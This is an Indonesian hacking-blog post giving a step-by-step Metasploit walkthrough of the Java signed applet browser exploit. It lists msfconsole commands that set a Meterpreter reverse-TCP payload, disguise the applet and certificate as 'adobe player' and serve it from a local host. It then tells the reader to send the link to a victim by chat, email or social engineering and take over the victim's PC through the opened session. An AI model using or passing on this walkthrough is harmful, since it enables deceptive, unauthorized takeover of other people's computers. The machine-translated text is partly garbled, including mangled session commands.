eksploitasi Java Signed Applet | Ini Blog ku - Hacking News
Ini Blog Ku - Hacking News

Jul 22, 2013

eksploitasi Java Signed Applet

Mengeksploitasi ini secara dinamis menciptakan sebuah file jar. Melalui Msf :: Exploit :: Jawa mixin, kemudian tanda-tanda itu. dihasilkan applet ditandatangani disajikan kepada korban melalui halaman web dengan tag applet. 

Korban JVM akan muncul dialog yang menanyakan apakah mereka mempercayai applet ditandatangani. Pada versi dialog akan menampilkan nilai CERTCN dalam "Penerbit" line. Baru JVMs display "UNKNOWN" ketika tanda tangan tidak dipercaya (yaitu, itu tidak ditandatangani oleh CA yang dipercaya). Ini SigningCert pilihan memungkinkan Anda untuk memberikan kode terpercaya penandatanganan cert, nilai-nilai yang akan menimpa CERTCN.

Jika SigningCert tidak diberikan, yang secara acak diri menandatangani sertifikat akan digunakan. Either way, setelah pengguna mengklik "run", applet dijalankan dengan hak akses pengguna penuh.

Buka backtrack terminal tipe msfconsole

use exploit/multi/browser/java_signed_applet press enter

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp

Msf exploit (Java_signed-applet)>Set appletname adobe (applet utama adalah nama kelas)

Msf exploit (Java_signed-applet)>Set certcn adobe player (nilai untuk sertifikat)

Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (Ini harus menjadi alamat pada komputer lokal)

Msf exploit (Java_signed-applet)>Set srvport 80 (Port lokal kita gunakan standar/defaulth: 8080)

Msf exploit (Java_signed-applet)>Set uripath adobevideos (Url Ini digunakan untuk mengeksploitasi)

Msf exploit (Java_signed-applet)>Set lport 443

Msf exploit (Java_signed-applet)>exploit

Sekarang URL Anda harus memberikan kepada korban Anda : 192.168.1.4/adobevideos

Kirim link server ke korban melalui chatting atau email atau teknik rekayasa sosial.
Ketika korban membuka link yang di browser mereka, segera akan memberitahukan kotak dialog tentang tanda tangan digital tidak dapat diverifikasi seperti gambar di bawah ini.

eksploitasi

Anda sekarang memiliki akses ke PC korban. Gunakan "Sesi-l" dan nomor Sesi untuk menghubungkan ke sesi. Dan Sekarang Ketik "sesi-i ID"

S0urces : Backtrack Linux

Artikel Terkait

0komentar:

Post a Comment